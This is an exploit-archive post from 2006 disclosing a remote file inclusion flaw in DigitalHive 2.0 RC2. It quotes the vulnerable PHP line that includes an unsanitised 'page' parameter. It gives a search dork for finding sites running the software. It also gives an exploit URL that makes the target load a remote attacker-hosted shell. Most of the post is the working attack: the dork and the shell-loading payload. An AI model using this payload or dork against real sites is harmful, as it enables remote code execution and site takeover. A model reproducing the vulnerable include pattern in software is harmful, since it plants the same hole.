[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : DigitalHive <= 2.0 RC2 (base_include.php) Remote Include Vulnerability
# Published : 2006-10-15
# Author : SHiKaA
# Previous Title : phpBBFM <= 206-3-3 (phpbb_root_path) Remote File Include Exploit
# Next Title : Def-Blog <= 1.0.3 (comadd.php) Remote SQL Injection Vulnerability
#==============================================================================================
#DigitalHive <= v2.0 RC2 (page) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://www.digitalhive.com/base.php?page=site/telechargements.php&var=accueil
#
#Version : v2.0 RC2
#
#================================================================================================
#
#DORK : "Powered by DigitalHive"
#
#================================================================================================
#Bug in : template/purpletech/base_include.php
#
#Vlu Code :
#--------------------------------
#
# <?php include ($_GET["page"]); ?>
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/template/purpletech/base_include.php?page=http://SHELLURL?
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Thx To : Str0ke & SuperRomio & XoRon & MDx & Simo
# sPECial THanks to : Coder-AZH@CKTEAM
==================================================================================================
# www.Syue.com [2006-10-15]